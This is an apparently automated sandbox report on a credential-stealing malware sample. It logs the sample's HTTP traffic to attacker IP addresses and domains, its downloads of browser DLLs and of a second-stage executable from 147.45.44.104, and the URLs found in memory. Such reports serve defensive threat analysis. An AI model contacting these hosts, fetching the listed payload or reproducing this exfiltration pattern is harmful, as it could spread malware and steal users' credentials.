Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIDAKJDHJKFHIEBFCGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJJDGDHDGDAKFIECFIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IECGHJKKJDHIEBFHCAKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCAAAFCBFBAKFHJDBKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 97901Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCAAAFCBFBAKFHJDBKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: appleboltelwk.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: surveriysiop.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: captainynfanw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tearrybyiwo.shop
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Connection: Keep-AliveCache-Control: no-cacheHost: cowod.hopto.org
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: appleboltelwk.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tendencerangej.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=iwe0L.74VvWLJDBCk9Lw2uZjn2chhTMi6nfgULg0WVY-1726937535-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: tendencerangej.shop
Source: global traffic	HTTP traffic detected: GET /prog/66eef0ca0fb35_lfdsa.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBAAFHDHCBGCAKFHDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 5785Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_00406963

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Connection: Keep-AliveCache-Control: no-cacheHost: cowod.hopto.org
Source: global traffic	HTTP traffic detected: GET /prog/66eef0ca0fb35_lfdsa.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: appleboltelwk.shop
Source: global traffic	DNS traffic detected: DNS query: surveriysiop.shop
Source: global traffic	DNS traffic detected: DNS query: captainynfanw.shop
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic	DNS traffic detected: DNS query: tearrybyiwo.shop
Source: global traffic	DNS traffic detected: DNS query: tendencerangej.shop

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.0000000001508000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe
Source: RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe1kkkktoken
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exeR
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exeh
Source: RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exeorm-data;
Source: file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.HJDBKJ
Source: RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: RegAsm.exe, 00000003.00000002.2429083892.0000000001508000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgBKJ
Source: file.exe, 00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoDGCAAFB
Source: RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.multipart/form-data;
Source: file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 66eef0ca0fb35_lfdsa[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
